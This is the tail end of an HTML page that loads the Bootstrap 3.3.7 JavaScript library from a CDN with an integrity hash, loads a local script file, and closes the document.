	<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
	<script src="js/script.js"></script>




</html>